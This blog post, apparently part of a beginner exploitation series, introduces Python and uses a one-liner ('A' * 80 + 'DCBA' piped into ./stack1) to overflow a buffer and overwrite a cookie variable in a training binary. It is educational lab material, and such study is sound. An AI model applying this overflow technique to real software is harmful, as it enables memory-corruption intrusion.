This post will cover:
1. Quick intro to Python
2. Ways Python can be used
3. How we can use Python to solve the first challenge
Quick intro to Python
Why are we going to cover Python? Unfortunately, PowerShell isn't as ubiquitous in all areas like with *NIX, IDA and so many other places that love Python. Plus, it's helpful knowing Python as it's pretty handy in many ways. Remember in the last post how we had to count out all of those A's to get what we needed? Python would have made that a whole lot easier. We're still going through manual ways to achieve our goals, but also integrate Python to make it easier and faster to do the same thing.
Here's my short intro on how to learn what we need for Python: Go here to the free Cybrary Python course. There's many resources to learn Python on the Internet if you'd like to go somewhere else. You don't need to get to the packet manipulation portion if you don't want to or other advance topics for this specific post. It will help you though to develop your skills with Python.
Ways Python can be used
If you went through the material above, you may have seen the ways it can be used. If not, there's three ways in particular I want to point out.
1. Interactively in it's own "shell". Fun fact: IDA has a Python shell.
2. We can also use it as part of a stdin/stdout pipeline. This would be helpful to quickly do things with Python to pass along to another object in the pipeline like so:
3. Or we can call Python scripts to do more things for us:
So many ways Python can be used. Such fun. Wow.
How we can use Python to solve the first challenge
It wasn't very fun typing out a lot of A's to get our answer. Normally you would use a scripting language like Python to do that for you. That's what we're going to do now! We will do it like the second example above to solve the challenge. But Brain, if we overflow it with "Hello World", won't that mess up the way we solved it like last time? Let's recap the previous post.
There were two variables of buf and cookie in the program. We needed to overflow a value into buf that would overflow into cookie. To solve it, we had to fill buf with 80 A's and cookie with DBCA (44434241 in ASCII). In that post, we manually entered inside GDB 80 A's then DCBA (which translated to 0x41424344) to overflow correctly to win.
Let's solve it with Python!
1. Open up a Terminal window
2. Browse to where the first challenge is
3. Let's try some fun examples first. Type in:
python -c 'print "AAAA"'
The "c" argument to Python tells it to run a command. Our command is the print function to print out "AAAA". Now you should see:
I don't want to type out more A's than I need to.
4. In Terminal, type in:
python -c 'print "A" * 80'
We should now see 80 A's:
5. Almost there. Let's see if we can just add "DCBA". Type in:
python -c 'print "A" * 80 "DCBA"'
Oh. We should add those two statements together for one string.
6. in Terminal, type in:
python -c 'print "A" * 80 + "DCBA"'
7. Let's try it now as input to our program. In Terminal, type in:
python -c 'print "A" * 80 + "DCBA"' | ./stack1
Win!
So much easier doing it this way than typing everything out!
No comments:
Post a Comment